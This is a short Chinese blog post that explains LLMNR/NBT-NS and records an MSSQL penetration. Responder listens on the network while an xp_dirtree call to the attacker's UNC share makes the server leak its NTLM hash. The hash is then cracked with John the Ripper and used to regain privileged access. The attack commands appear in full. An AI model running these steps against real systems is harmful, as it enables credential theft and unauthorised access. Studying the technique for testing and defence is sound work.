浅析mssql渗透之XP_dirtree LLMNR/NBT-NS欺骗攻击

LIMNR是什么?

链路本地多播名称解析(LIMNR)是一个基于协议的域名系统(DNS)数据包的格式,使得双方的IPv4和IPv6的主机来执行名称解析为同一本地链路上的主机,当局域网中的DNS服务器不可用时,DNS客户端会使用LIMNR本地链路多播名称解析来解析本地的主机名称

NetBIOS是什么?

Netbios(Network Basic Input Output System):网络基本输入输出系统,提供OSI模型中的会话层服务,分享数据,是一种应用程序接口API同时系统可以利用WINS服务将NetBIOS名解析为相应IP地址,局域网都是在NetBIOS协议的基础上工作的

当dns解析发送错误时,LLMNR(链路本地多播名称解析)和NBT-NS会代替解析

        监听LLMNR和NetBIOS协议的可以使用Metasploit或者Responder工具

Responder工具使用

        下载地址:Responder下载

        Responder是监听LLMNR和NetBIOS协议的工具之一,能够抓取网络中的所有LLMNR和NetBIOS请求并进行响应,获取最初的账户凭证,可以利用内置SMB,MSSQL,HTTP,DNS,POP3,FTP等服务器,收集目标文件的凭证

responder -h

responder -I <网卡> -i <ip地址>

记录一次mssql渗透

        通过SMB得到mssql用户并且进行mssql数据库登录,执行xp_cmdshell发现无权限开启

         发现可以执行扩展存储xq_dirtree

        配合xp_dirtree存储过程获取运行mssql服务的用户NTLM的hash值,原理是通过LLMNR/NBT-NS欺骗攻击,让MSSQL去访问我们伪造的服务,当MSSQL去执行时就会把它自己的凭证发给我们,我们通过破解它的凭证在返回登录MSSQL,得到最高权限具体操作

使用命令responder-I eth0 -i ip地址

回到mssqlclient.py的命令窗口中,执行命令xp_dirtree "\\172.16.1.100\test" 然后回到Responder观察监听信息 

 导入一个文件里面 使用jhon破解

jhon --wordlist=/usr/share/wordlists/rockyou.txt <文件名>

最后破解到密码重新登录mssql得到最高权限

  • 7
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值